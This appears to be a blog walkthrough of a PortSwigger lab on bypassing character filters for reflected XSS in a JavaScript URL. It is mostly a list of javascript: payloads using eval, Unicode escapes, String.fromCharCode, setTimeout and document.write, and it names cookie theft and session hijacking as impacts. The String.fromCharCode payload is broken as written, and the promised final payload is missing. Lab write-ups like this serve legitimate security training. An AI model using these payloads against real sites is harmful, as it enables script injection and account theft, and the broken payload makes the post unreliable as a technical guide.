Bypassing Character Restrictions in Reflected XSS-PortSwigger Lab Walkthrough

Introduction
This lab demonstrates how some applications attempt to block certain characters to prevent XSS but fail due tp bypass techniques.
Lab Overview
This lab reflects user input in a JavaScript URL context. However, some characters are blocked to mitigate XSS attacks. Our goal is to execute an alert(1337) by bypassing these restrictions.
Identifying the Vulnerability
The application reflects user input in a JavaScript URL.
Some special characters are blocked.
We need to find a bypass to execute JavaScript successfully.
Testing Basic XSS Payloads
We first test a basic JavaScript payload:
javascript:alert(1337)
If the alert() function or some characters are blocked, we try:
javascript:eval(‘alert(1337)’)
Or Unicode encoding to bypass filters:
javascript:\u0061\u006c\u0065\u0072\u0074(1337)
Finding a Working Bypass
If parentheses or alert are blocked, we use alternative execution methods:
Using String.fromCharCode
javascript:String.fromCharCode(97, 108, 101, 114, 116)(1337)
Using setTimeout
javascript:setTimeout(‘alert(1337)’)
Using document.write
javascript:document.write(‘<script>alert(1337)<\/script>’)
Executing the Attack
Identify which characters are blocked.
Modify the payload to bypass filters.
Inject the payload into the vulnerable parameter.
Execute the XSS attack successfully.
Copy the lab Id and paste in the given payload below:
Understanding the Impact
This vulnerability allows an attacker to execute arbitrary JavaScript in the victim’s browser, leading to:
Cookie theft using document.cookie
Session hijacking
Phishing attacks
Keylogging or defacement attacks
Conclusion
Even though developers try to block certain characters to prevent XSS, attackers can still find creative ways to bypass these restrictions. This lab teaches us the importance of proper output encoding and context-aware sanitization in preventing XSS.
Subscribe to my newsletter
Read articles from Hacker2255 directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by
